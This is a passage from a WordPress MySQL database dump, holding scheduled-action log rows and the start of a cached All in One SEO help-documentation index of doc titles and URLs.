00:20:42'),(468137,156148,'action created','2025-05-16 18:50:42','2025-05-17 00:20:42'),(468138,156147,'action started via WP Cron','2025-05-16 18:55:56','2025-05-17 00:25:56'),(468139,156147,'action complete via WP Cron','2025-05-16 18:55:56','2025-05-17 00:25:56'),(468140,156149,'action created','2025-05-16 18:55:56','2025-05-17 00:25:56'),(468141,156148,'action started via WP Cron','2025-05-16 18:55:56','2025-05-17 00:25:56'),(468142,156148,'action complete via WP Cron','2025-05-16 18:55:56','2025-05-17 00:25:56'),(468143,156150,'action created','2025-05-16 18:55:56','2025-05-17 00:25:56'),(468144,156149,'action started via WP Cron','2025-05-16 18:56:56','2025-05-17 00:26:56'),(468145,156149,'action complete via WP Cron','2025-05-16 18:56:56','2025-05-17 00:26:56'),(468146,156151,'action created','2025-05-16 18:56:56','2025-05-17 00:26:56'),(468147,156150,'action started via WP Cron','2025-05-16 18:56:56','2025-05-17 00:26:56'),(468148,156150,'action complete via WP Cron','2025-05-16 18:56:56','2025-05-17 00:26:56'),(468149,156152,'action created','2025-05-16 18:56:56','2025-05-17 00:26:56'),(468150,156151,'action started via WP Cron','2025-05-16 19:01:01','2025-05-17 00:31:01'),(468151,156151,'action complete via WP Cron','2025-05-16 19:01:01','2025-05-17 00:31:01'),(468152,156153,'action created','2025-05-16 19:01:01','2025-05-17 00:31:01'),(468153,156152,'action started via WP Cron','2025-05-16 19:01:01','2025-05-17 00:31:01'),(468154,156152,'action complete via WP Cron','2025-05-16 19:01:01','2025-05-17 00:31:01'),(468155,156154,'action created','2025-05-16 19:01:01','2025-05-17 00:31:01'),(468156,156153,'action started via WP Cron','2025-05-16 19:03:39','2025-05-17 00:33:39'),(468157,156153,'action complete via WP Cron','2025-05-16 19:03:39','2025-05-17 00:33:39'),(468158,156155,'action created','2025-05-16 19:03:39','2025-05-17 00:33:39'),(468159,156154,'action started via WP Cron','2025-05-16 19:03:39','2025-05-17 00:33:39'),(468160,156154,'action complete via WP Cron','2025-05-16 19:03:39','2025-05-17 00:33:39'),(468161,156156,'action created','2025-05-16 19:03:39','2025-05-17 00:33:39'),(468162,156155,'action started via WP Cron','2025-05-16 19:13:15','2025-05-17 00:43:15'),(468163,156155,'action complete via WP Cron','2025-05-16 19:13:15','2025-05-17 00:43:15'),(468164,156157,'action created','2025-05-16 19:13:15','2025-05-17 00:43:15'),(468165,156156,'action started via WP Cron','2025-05-16 19:13:15','2025-05-17 00:43:15'),(468166,156156,'action complete via WP Cron','2025-05-16 19:13:15','2025-05-17 00:43:15'),(468167,156158,'action created','2025-05-16 19:13:15','2025-05-17 00:43:15'),(468168,156157,'action started via WP Cron','2025-05-16 19:14:45','2025-05-17 00:44:45'),(468169,156157,'action complete via WP Cron','2025-05-16 19:14:45','2025-05-17 00:44:45'),(468170,156159,'action created','2025-05-16 19:14:45','2025-05-17 00:44:45'),(468171,156158,'action started via WP Cron','2025-05-16 19:14:45','2025-05-17 00:44:45'),(468172,156158,'action complete via WP Cron','2025-05-16 19:14:45','2025-05-17 00:44:45'),(468173,156160,'action created','2025-05-16 19:14:45','2025-05-17 00:44:45'),(468174,156159,'action started via WP Cron','2025-05-16 19:18:02','2025-05-17 00:48:02'),(468175,156159,'action complete via WP Cron','2025-05-16 19:18:02','2025-05-17 00:48:02'),(468176,156161,'action created','2025-05-16 19:18:02','2025-05-17 00:48:02'),(468177,156160,'action started via WP Cron','2025-05-16 19:18:02','2025-05-17 00:48:02'),(468178,156160,'action complete via WP Cron','2025-05-16 19:18:02','2025-05-17 00:48:02'),(468179,156162,'action created','2025-05-16 19:18:02','2025-05-17 00:48:02'),(468180,156161,'action started via WP Cron','2025-05-16 19:37:54','2025-05-17 01:07:54'),(468181,156161,'action complete via WP Cron','2025-05-16 19:37:54','2025-05-17 01:07:54'),(468182,156163,'action created','2025-05-16 19:37:54','2025-05-17 01:07:54'),(468183,156162,'action started via WP Cron','2025-05-16 19:37:54','2025-05-17 01:07:54'),(468184,156162,'action complete via WP Cron','2025-05-16 19:37:54','2025-05-17 01:07:54'),(468185,156164,'action created','2025-05-16 19:37:54','2025-05-17 01:07:54'),(468186,156163,'action started via WP Cron','2025-05-16 19:41:39','2025-05-17 01:11:39'),(468187,156163,'action complete via WP Cron','2025-05-16 19:41:39','2025-05-17 01:11:39'),(468188,156165,'action created','2025-05-16 19:41:39','2025-05-17 01:11:39'),(468189,156164,'action started via WP Cron','2025-05-16 19:41:39','2025-05-17 01:11:39'),(468190,156164,'action complete via WP Cron','2025-05-16 19:41:39','2025-05-17 01:11:39'),(468191,156166,'action created','2025-05-16 19:41:39','2025-05-17 01:11:39'),(468192,156165,'action started via WP Cron','2025-05-16 19:45:46','2025-05-17 01:15:46'),(468193,156165,'action complete via WP Cron','2025-05-16 19:45:46','2025-05-17 01:15:46'),(468194,156167,'action created','2025-05-16 19:45:46','2025-05-17 01:15:46'),(468195,156166,'action started via WP Cron','2025-05-16 19:45:46','2025-05-17 01:15:46'),(468196,156166,'action complete via WP Cron','2025-05-16 19:45:46','2025-05-17 01:15:46'),(468197,156168,'action created','2025-05-16 19:45:46','2025-05-17 01:15:46');
/*!40000 ALTER TABLE `wp_actionscheduler_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aioseo_cache`
--

DROP TABLE IF EXISTS `wp_aioseo_cache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_aioseo_cache` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `key` varchar(80) NOT NULL,
  `value` longtext NOT NULL,
  `expiration` datetime DEFAULT NULL,
  `created` datetime NOT NULL,
  `updated` datetime NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `ndx_aioseo_cache_key` (`key`),
  KEY `ndx_aioseo_cache_expiration` (`expiration`)
) ENGINE=InnoDB AUTO_INCREMENT=5875 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aioseo_cache`
--

LOCK TABLES `wp_aioseo_cache` WRITE;
/*!40000 ALTER TABLE `wp_aioseo_cache` DISABLE KEYS */;
INSERT INTO `wp_aioseo_cache` VALUES (989,'admin_help_docs','s:58254:\"{\"categories\":{\"getting-started\":\"Getting Started\",\"advanced-settings\":\"Advanced Settings\",\"display-settings\":\"Display Settings\",\"general-seo-topics\":\"General SEO Topics\",\"feature-manager\":\"Feature Manager\",\"installation\":\"Installation\"},\"docs\":{\"77593\":{\"title\":\"How To Fix Javascript Errors\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-fix-javascript-errors\\/\",\"categories\":[]},\"77589\":{\"title\":\"Browser Support Policy\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/browser-support-policy\\/\",\"categories\":[]},\"75143\":{\"title\":\"How to Redirect a Post from the Edit Post Screen\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-redirect-a-post-from-the-edit-post-screen\\/\",\"categories\":[\"post-page-settings\",\"redirection-manager\"]},\"75686\":{\"title\":\"Preventing the Modified Date for Content from Changing\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/preventing-the-modified-date-for-content-from-changing\\/\",\"categories\":[\"post-page-settings\"]},\"73002\":{\"title\":\"Page Builder Integrations\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/page-builder-integrations\\/\",\"categories\":[\"home-page-settings\",\"post-page-settings\",\"third-party-integrations\",\"truseo\"]},\"73003\":{\"title\":\"Integrating with IndexNow to Instantly Re-index Your Content\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/integrating-with-indexnow-to-instantly-re-index-your-content\\/\",\"categories\":[\"indexnow\",\"webmaster-tools\"]},\"72711\":{\"title\":\"aioseo_page_builder_integration_disable\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_page_builder_integration_disable\\/\",\"categories\":[]},\"68444\":{\"title\":\"An Introduction to Link Assistant \\u2014 The Easy Way to Manage Onsite Links\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/introduction-to-link-assistant\\/\",\"categories\":[\"link-assistant\"]},\"69559\":{\"title\":\"Using the Link Assistant in All in One SEO Pro\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/link-assistant\\/\",\"categories\":[\"link-assistant\"]},\"69594\":{\"title\":\"Internal Links in the Links Report in Link Assistant\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/internal-links-in-the-links-report-in-link-assistant\\/\",\"categories\":[\"link-assistant\"]},\"69596\":{\"title\":\"External Links in the Links Report in Link Assistant\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/external-links-in-the-links-report-in-link-assistant\\/\",\"categories\":[\"link-assistant\"]},\"69921\":{\"title\":\"Link Suggestions in the Links Report in Link Assistant\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/link-suggestions-in-the-links-report-in-link-assistant\\/\",\"categories\":[\"link-assistant\"]},\"69602\":{\"title\":\"Affiliate Links in the Links Report in Link Assistant\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/affiliate-links-in-the-links-report-in-link-assistant\\/\",\"categories\":[\"link-assistant\"]},\"69761\":{\"title\":\"Using the Domains Report in Link Assistant\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-the-domains-report-in-link-assistant\\/\",\"categories\":[\"link-assistant\"]},\"69770\":{\"title\":\"Link Assistant Settings\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/link-assistant-settings\\/\",\"categories\":[\"link-assistant\"]},\"68431\":{\"title\":\"aioseo_sitemap_images\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_sitemap_images\\/\",\"categories\":[\"filter-hooks\"]},\"66833\":{\"title\":\"Why Is N\\/A Displayed Instead of a Score For My Content?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/why-is-na-displayed-instead-of-a-score-for-my-content\\/\",\"categories\":[\"frequently-asked-questions\",\"truseo\"]},\"18824\":{\"title\":\"Local Business SEO for a Single Location\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/local-business-seo-for-a-single-location\\/\",\"categories\":[\"local-business-seo\",\"schema-settings\"]},\"35828\":{\"title\":\"Local Business SEO for Multiple Locations\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/local-business-seo-for-multiple-locations\\/\",\"categories\":[\"local-business-seo\"]},\"58476\":{\"title\":\"aioseo_public_taxonomies\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_public_taxonomies\\/\",\"categories\":[\"filter-hooks\"]},\"58475\":{\"title\":\"aioseo_public_post_types\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_public_post_types\\/\",\"categories\":[\"filter-hooks\"]},\"64776\":{\"title\":\"How Long Does it Take For My Content to Appear on Google?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-long-does-it-take-for-my-content-to-appear-on-google\\/\",\"categories\":[\"frequently-asked-questions\"]},\"35926\":{\"title\":\"Adding a Location in Local SEO Addon\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/adding-a-location-in-local-seo-addon\\/\",\"categories\":[\"local-business-seo\"]},\"61020\":{\"title\":\"How to Display a Favicon in Search Results\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-display-a-favicon-in-search-results\\/\",\"categories\":[\"frequently-asked-questions\",\"general-seo-topics\"]},\"35956\":{\"title\":\"Displaying Locations on Your Site\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/displaying-locations-on-your-site\\/\",\"categories\":[\"local-business-seo\"]},\"56330\":{\"title\":\"aioseo_sitemap_indexes\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_sitemap_indexes\\/\",\"categories\":[]},\"52689\":{\"title\":\"aioseo_flyout_menu_enable\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_flyout_menu_disable\\/\",\"categories\":[\"filter-hooks\"]},\"45698\":{\"title\":\"Displaying your Business Information and Star Ratings on a Map\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-places-on-your-maps\\/\",\"categories\":[\"local-business-seo\"]},\"49268\":{\"title\":\"aioseo_access_control_excluded_roles\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_access_control_excluded_roles\\/\",\"categories\":[\"filter-hooks\"]},\"44555\":{\"title\":\"Setting up Google Maps for Local SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-up-google-maps\\/\",\"categories\":[\"local-business-seo\"]},\"48189\":{\"title\":\"How to Create an HTML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/html-sitemap\\/\",\"categories\":[\"html-sitemap\"]},\"48365\":{\"title\":\"Using a Widget to Display Your HTML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-a-widget-to-display-your-html-sitemap\\/\",\"categories\":[\"html-sitemap\"]},\"48361\":{\"title\":\"Using PHP Code to Display Your HTML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/function-html-sitemap\\/\",\"categories\":[\"html-sitemap\"]},\"48260\":{\"title\":\"Using a Block to Display Your HTML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-a-block-to-display-your-html-sitemap\\/\",\"categories\":[\"html-sitemap\"]},\"48222\":{\"title\":\"aioseo_breadcrumbs_separator_symbol\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_breadcrumbs_separator_symbol\\/\",\"categories\":[\"filter-hooks\"]},\"48227\":{\"title\":\"aioseo_breadcrumbs_template\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_breadcrumbs_template\\/\",\"categories\":[\"filter-hooks\"]},\"48231\":{\"title\":\"aioseo_breadcrumbs_trail\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_breadcrumbs_trail\\/\",\"categories\":[\"filter-hooks\"]},\"48232\":{\"title\":\"aioseo_breadcrumbs_link_current_item\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_breadcrumbs_link_current_item\\/\",\"categories\":[\"filter-hooks\"]},\"48233\":{\"title\":\"aioseo_breadcrumbs_show_current_item\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_breadcrumbs_show_current_item\\/\",\"categories\":[\"filter-hooks\"]},\"48219\":{\"title\":\"aioseo_breadcrumbs_output\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_breadcrumbs_output\\/\",\"categories\":[\"filter-hooks\"]},\"48223\":{\"title\":\"aioseo_breadcrumbs_separator\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_breadcrumbs_separator\\/\",\"categories\":[\"filter-hooks\"]},\"48238\":{\"title\":\"Using a Shortcode to Display Your HTML Sitemap\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/shortcode-html-sitemap\\/\",\"categories\":[\"html-sitemap\"]},\"45805\":{\"title\":\"aioseo_sitemap_exclude_terms\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_sitemap_exclude_terms\\/\",\"categories\":[\"filter-hooks\"]},\"45804\":{\"title\":\"aioseo_sitemap_exclude_posts\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_sitemap_exclude_posts\\/\",\"categories\":[\"filter-hooks\"]},\"61002\":{\"title\":\"How to Create a Google Maps API Key\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-create-a-google-maps-api-key\\/\",\"categories\":[\"local-business-seo\"]},\"45528\":{\"title\":\"aioseo_schema_output\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_schema_output\\/\",\"categories\":[\"filter-hooks\"]},\"42995\":{\"title\":\"Using the Headline Analyzer in All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-the-headline-analyzer-in-all-in-one-seo\\/\",\"categories\":[\"headline-analyzer\"]},\"42683\":{\"title\":\"How to Perform a Full Site Redirect\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/full-site-redirects\\/\",\"categories\":[\"redirection-manager\"]},\"50988\":{\"title\":\"Displaying Maps on Your Site\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/displaying-maps-on-your-site\\/\",\"categories\":[\"local-business-seo\"]},\"42999\":{\"title\":\"How to Disable the Headline Analyzer\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-disable-the-headline-analyzer\\/\",\"categories\":[\"headline-analyzer\"]},\"42975\":{\"title\":\"Installing Addons for All in One SEO Pro\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/installing-addons-for-all-in-one-seo-pro\\/\",\"categories\":[\"installation\"]},\"42854\":{\"title\":\"Creating a Pass Through Redirect\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/creating-a-pass-through-redirect\\/\",\"categories\":[\"redirection-manager\"]},\"41800\":{\"title\":\"Using Custom Rules in the Redirection Manager\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/redirection-manager-custom-rules\\/\",\"categories\":[\"redirection-manager\"]},\"42224\":{\"title\":\"Resetting the Settings in All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/resetting-the-settings-in-all-in-one-seo\\/\",\"categories\":[\"database-tools\"]},\"41884\":{\"title\":\"Setting the Site Name for Facebook\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-site-name-for-facebook\\/\",\"categories\":[\"facebook-settings\",\"social-networks\"]},\"41862\":{\"title\":\"How to Get Google to Display the Sitelinks Search Box\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-get-google-to-display-the-sitelinks-search-box\\/\",\"categories\":[\"schema-settings\"]},\"41851\":{\"title\":\"Setting the SEO Title and Description Format for the Search Results Page\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-the-seo-title-and-description-format-for-the-search-results-page\\/\",\"categories\":[\"content-type-settings\",\"search-appearance\"]},\"41811\":{\"title\":\"SEO Analysis Unable to Connect to Your Site\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/seo-analysis-unable-to-connect-to-your-site\\/\",\"categories\":[\"seo-analysis\",\"troubleshooting\"]},\"41280\":{\"title\":\"How to Renew Your AIOSEO License\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-renew-your-aioseo-license\\/\",\"categories\":[\"frequently-asked-questions\",\"getting-started\"]},\"41077\":{\"title\":\"Update WordPress: WordPress Versions Supported by AIOSEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/update-wordpress\\/\",\"categories\":[\"troubleshooting\"]},\"40587\":{\"title\":\"How to Open the Browser Error Console\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-open-the-browser-error-console\\/\",\"categories\":[\"troubleshooting\"]},\"40582\":{\"title\":\"How to Enable Debugging in WordPress\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-enable-debugging-in-wordpress\\/\",\"categories\":[\"troubleshooting\"]},\"40148\":{\"title\":\"What is TruSEO?\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/what-is-truseo\\/\",\"categories\":[\"frequently-asked-questions\",\"truseo\"]},\"39494\":{\"title\":\"Redirecting Attachment Pages\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/redirecting-attachment-pages\\/\",\"categories\":[\"media-settings\",\"search-appearance\"]},\"66310\":{\"title\":\"Selecting the Google Maps APIs to use with All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/selecting-the-google-maps-apis-to-use-with-all-in-one-seo\\/\",\"categories\":[\"local-business-seo\"]},\"38915\":{\"title\":\"Setting Up and Using Breadcrumbs Templates\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/setting-up-and-using-breadcrumbs-templates\\/\",\"categories\":[\"breadcrumbs\"]},\"38610\":{\"title\":\"Displaying Breadcrumbs On Your Site\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/displaying-breadcrumbs-on-your-site\\/\",\"categories\":[\"breadcrumbs\"]},\"36048\":{\"title\":\"Function: aioseo_breadcrumbs()\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/function-aioseo_breadcrumbs\\/\",\"categories\":[\"breadcrumbs\"]},\"36047\":{\"title\":\"Shortcode: [aioseo_breadcrumbs]\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/shortcode-aioseo_breadcrumbs\\/\",\"categories\":[\"breadcrumbs\"]},\"38240\":{\"title\":\"aioseo_social_image_ignore_cover_block\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_social_image_ignore_cover_block\\/\",\"categories\":[\"filter-hooks\"]},\"37961\":{\"title\":\"aioseo_classic_editor_disable_emoji_script\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_classic_editor_disable_emoji_script\\/\",\"categories\":[\"filter-hooks\"]},\"34923\":{\"title\":\"How to Redirect a Post or Page in All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-redirect-a-post-or-page-in-all-in-one-seo\\/\",\"categories\":[\"redirection-manager\"]},\"34977\":{\"title\":\"How to Redirect Multiple URLs to the Same Destination\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/how-to-redirect-multiple-urls-to-the-same-destination\\/\",\"categories\":[\"redirection-manager\"]},\"35604\":{\"title\":\"Automatic Redirects When URLs Change in Content\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/automatic-redirects-when-urls-change-in-content\\/\",\"categories\":[\"redirection-manager\"]},\"31460\":{\"title\":\"Enhanced Search Query Conflict\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/enhanced-search-query-conflict\\/\",\"categories\":[\"local-business-seo\"]},\"30850\":{\"title\":\"aioseo_local_business_info_email_icon\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_info_email_icon\\/\",\"categories\":[\"filter-hooks\"]},\"30839\":{\"title\":\"aioseo_local_business_info_location_icon\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_info_location_icon\\/\",\"categories\":[\"filter-hooks\"]},\"30756\":{\"title\":\"aioseo_local_business_get_locations_by_category_posts\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_get_locations_by_category_posts\\/\",\"categories\":[\"filter-hooks\"]},\"30755\":{\"title\":\"aioseo_local_business_get_locations_by_category_args\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_get_locations_by_category_args\\/\",\"categories\":[\"filter-hooks\"]},\"30754\":{\"title\":\"aioseo_local_business_get_location_categories\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_get_location_categories\\/\",\"categories\":[\"filter-hooks\"]},\"30751\":{\"title\":\"aioseo_local_business_get_locations_posts\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_get_locations_posts\\/\",\"categories\":[\"filter-hooks\"]},\"30753\":{\"title\":\"aioseo_local_business_get_location_category_args\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_get_location_category_args\\/\",\"categories\":[\"filter-hooks\"]},\"30759\":{\"title\":\"aioseo_local_business_output_business_info_instance\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_output_business_info_instance\\/\",\"categories\":[\"filter-hooks\"]},\"30760\":{\"title\":\"aioseo_local_business_output_business_info_location_data\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_output_business_info_location_data\\/\",\"categories\":[\"filter-hooks\"]},\"30761\":{\"title\":\"aioseo_local_business_output_location_category_instance\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_output_location_category_instance\\/\",\"categories\":[\"filter-hooks\"]},\"30764\":{\"title\":\"aioseo_local_business_output_location_category_location_data\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_output_location_category_location_data\\/\",\"categories\":[\"filter-hooks\"]},\"30765\":{\"title\":\"aioseo_local_business_output_opening_hours_instance\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_output_opening_hours_instance\\/\",\"categories\":[\"filter-hooks\"]},\"30766\":{\"title\":\"aioseo_local_business_output_opening_hours_data\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_output_opening_hours_data\\/\",\"categories\":[\"filter-hooks\"]},\"30849\":{\"title\":\"aioseo_local_business_info_phone_icon\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_info_phone_icon\\/\",\"categories\":[\"filter-hooks\"]},\"30851\":{\"title\":\"aioseo_local_business_opening_hours_icon\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_opening_hours_icon\\/\",\"categories\":[\"filter-hooks\"]},\"30398\":{\"title\":\"aioseo_local_business_post_type_name\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_post_type_name\\/\",\"categories\":[\"filter-hooks\"]},\"30551\":{\"title\":\"aioseo_local_business_post_type_slug\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_post_type_slug\\/\",\"categories\":[\"filter-hooks\"]},\"30556\":{\"title\":\"aioseo_local_business_post_type_single_label\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_post_type_single_label\\/\",\"categories\":[\"filter-hooks\"]},\"30559\":{\"title\":\"aioseo_local_business_post_type_plural_label\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_post_type_plural_label\\/\",\"categories\":[\"filter-hooks\"]},\"30560\":{\"title\":\"aioseo_local_business_post_type\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_post_type\\/\",\"categories\":[\"filter-hooks\"]},\"30563\":{\"title\":\"aioseo_local_business_taxonomy_name\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_taxonomy_name\\/\",\"categories\":[\"filter-hooks\"]},\"30564\":{\"title\":\"aioseo_local_business_taxonomy_slug\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_taxonomy_slug\\/\",\"categories\":[\"filter-hooks\"]},\"35609\":{\"title\":\"Choosing Which Redirect Type to Use\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/choosing-which-redirect-type-to-use\\/\",\"categories\":[\"redirection-manager\"]},\"35599\":{\"title\":\"Importing Redirects From Other Plugins\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/importing-redirects-from-other-plugins\\/\",\"categories\":[\"redirection-manager\"]},\"35588\":{\"title\":\"Exporting and Importing Redirects\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/exporting-and-importing-redirects\\/\",\"categories\":[\"redirection-manager\"]},\"35579\":{\"title\":\"Logging 404 Errors in All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/logging-404-errors-in-all-in-one-seo\\/\",\"categories\":[\"redirection-manager\"]},\"35552\":{\"title\":\"Logging Redirects in All in One SEO\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/logging-redirects-in-all-in-one-seo\\/\",\"categories\":[\"redirection-manager\"]},\"35570\":{\"title\":\"Redirect GDPR Privacy Information\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/redirect-gdpr-privacy-information\\/\",\"categories\":[\"redirection-manager\"]},\"30863\":{\"title\":\"Local Business SEO - Template overrides\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/local-business-seo-template-overrides\\/\",\"categories\":[\"local-business-seo\"]},\"35133\":{\"title\":\"aioseo_twitter_tags\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_twitter_tags\\/\",\"categories\":[\"filter-hooks\"]},\"35132\":{\"title\":\"aioseo_facebook_tags\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_facebook_tags\\/\",\"categories\":[\"filter-hooks\"]},\"34993\":{\"title\":\"Ignoring Case Sensitivity in Redirects\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/ignoring-case-sensitivity-in-redirects\\/\",\"categories\":[\"redirection-manager\"]},\"34983\":{\"title\":\"Ignoring the Trailing Slash in Redirects\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/ignoring-the-trailing-slash-in-redirects\\/\",\"categories\":[\"redirection-manager\"]},\"36104\":{\"title\":\"Using Query Parameters With Redirects\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/using-query-parameters-with-redirects\\/\",\"categories\":[\"redirection-manager\"]},\"30565\":{\"title\":\"aioseo_local_business_taxonomy\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/aioseo_local_business_taxonomy\\/\",\"categories\":[\"filter-hooks\"]},\"36115\":{\"title\":\"Caching of Redirects in the Browser\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/caching-of-redirects-in-the-browser\\/\",\"categories\":[\"redirection-manager\"]},\"34701\":{\"title\":\"Adding WooCommerce Product Attributes to SEO Title or Description\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/adding-woocommerce-product-attributes-to-seo-title-or-description\\/\",\"categories\":[\"post-page-settings\",\"search-appearance\",\"woocommerce\"]},\"36111\":{\"title\":\"Selecting the Redirect Method in Redirects\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/selecting-the-redirect-method-in-redirects\\/\",\"categories\":[\"redirection-manager\"]},\"40115\":{\"title\":\"Redirect Manager Cannot Detect Your Server\",\"url\":\"https:\\/\\/aioseo.com\\/docs\\/redirect-manager-unknown-web-server\\/\",\"categories\":[\"redirection-manager\"]},\"36369\":{\"title\":\"Using Regex in the Redirection 